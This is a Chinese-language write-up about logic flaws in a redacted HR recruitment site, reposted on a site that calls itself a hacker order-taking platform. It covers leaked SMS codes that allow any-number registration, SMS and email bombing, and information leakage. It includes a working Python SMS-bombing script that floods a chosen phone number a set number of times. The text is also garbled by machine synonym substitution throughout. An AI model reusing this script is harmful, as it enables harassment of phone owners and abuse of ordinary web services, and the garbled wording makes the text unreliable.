某HR业务网站逻辑漏洞挖掘案例以及POC编写思路分享-黑客接单平台

访客6年前黑客工具1096
东西预备 BurpSuiteFree (或许咱们最喜爱最常用的抓包神器,需求Java环境); 火狐浏览器(个人比较喜爱的浏览器;360/Chrome等浏览器都能够); SwitchyOmega插件(设置快速切换署理的浏览器插件); Python3(用来后期编写批量验证缝隙损害的POC)。 测验方针 方针:https://www_hddddddddd_com/(脱敏) IP地址:47.***.**.** 运营商:我国香港阿里云|网站中间件:Tomcat 操作体系:Linux Web结构:Bootstrap 已挖掘出的逻辑缝隙类型 恣意手机用户注册; 注册短信验证码轰炸; 暗码重置邮件轰炸; 未授权拜访导致灵敏信息走漏。 一、恣意手机用户注册(低危) (1)翻开浏览器,拜访该HR事务体系的注册页面(如下图所示): (2)在注册人手机输入框中随意恣意输入一个11位的手机号码,然后在浏览器中按F12调试出浏览器的开发者东西点击”Network”。然后点击“获取验证码”的按钮。然后咱们能够清楚看到Response成功显现了6位验证码。 (3)从头获取6位验证码进行恣意账号注册: (4)成功复现恣意账户注册: 二、注册短信验证码轰炸 (1)翻开BurpSuiteFree设置好浏览器的本地署理: (2)咱们抓取获取验证码的恳求包: (3)然后按Ctrl+R把这个恳求包发送到“Repeater”模块: (4)然后点击“Go”发送恳求包检查呼应数据包: 能够看到呼应包成功呼应而且返回了6位的验证码。 (5)接连点击“Go”发送恳求包检查呼应包: 能够看到每次的呼应包中的6位验证码都不相同,疑似存在短信验证码轰炸缝隙,这时候咱们要祭出咱们的Python来编写”验证码轰炸的POC”。 POC编写中心思路:经过Requests模块批量模仿浏览器客户端恳求获取注册验证码的数据包发送。 短信验证码轰炸POC代码如下: # -- coding: utf-8 -- import requests session = requests.session() headers = {'Referer':"https://www.**********.com/*****/reg", 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} n=0 url=("https://www.*********.com/r***/getMobileCode") def SmsBoom(phpnumber,url): data = {'mobile': phpnumber,} ron = session.post(url, headers=headers, data=data) phpnumber = input("请输入你的手机号码:") AckNumber = int(input("请你输入进犯的次数:")) while True: SmsBoom(phpnumber,url) n += 1 print("[+]成功发送{}条".format(n)) if n == AckNumber: print('完毕进犯') break SmsBoom(phpnumber,url) POC运转作用截图: POC运转后会让你输入承受的手机号码和进犯测验的次数来验证短信验证码轰炸缝隙,然后回车POC就会主动运转了。 手机短信收件箱的截图: 成功接收到20条注册验证码短信,成功验证而且复现了短信验证码轰炸缝隙。[1][2][3]黑客接单网

相关文章

RIG exploit kit:歹意活动剖析陈述

尽管攻击方式不算复杂,但是RIG仍然能通过一些恶意软件活动获得较大的流量。而那些利用被黑站点和恶意广告,重定向到RIG的流量,是通过服务端的302跳转机制,或者是通过客户端的iframe和JS脚本...

继续聊聊梦里的那点事儿(下)-黑客接单平台

前情概要:梦里那点事系列文章(上) 0×05 弱口令是个好东西 忽然有这么多方针,一时间不知从哪下手,这个时分直觉告诉我,机关单位站点也许是突破口。 经历告诉我,此类网站的管理员往往缺少安全防护认识。...

xHunt:针对科威特航运组织的攻击行动-黑客接单平台

2019年5月至6月,unit42安全团队在一起针对科威特航运业的进犯事情中,检测到了一个新后门东西——Hisoka,它的作用是下载几个的定制东西进行后缝隙运用,一切东西好像都由同一个开发人员创立,最...

ARM架构上用来替代JTAG的调试协议SWD-黑客接单平台

关于嵌入式开发人员和专门进犯硬件的黑客来说,JTAG 实践上是调试和拜访微处理器寄存器的标准。该协议已运用多年,至今仍在运用,JTAG调试接口有必要运用VCC、GND电源信号,以及TMS、TCK、TD...

CTF标题实战:2019-Hgame-Web-Week4

前语 最近使用空余时刻做了一下Hgame,以下是部分web题题解。 happyPython 信息收集 发现是flask,顺手测验一下。 http://118.25.18.223:3001/{{1+1}...

记载一次使用事务规划缺点缝隙的精彩实战测验

前语 前次的那篇文章《一名代码审计新手的实战阅历与感悟》得到了不少读者的支撑,也得到了FreeBuf这个渠道的必定,这给了我这个菜的不能再菜的小菜鸟很大的决心。可是,不足之处仍是许多,比方文章中呈现的...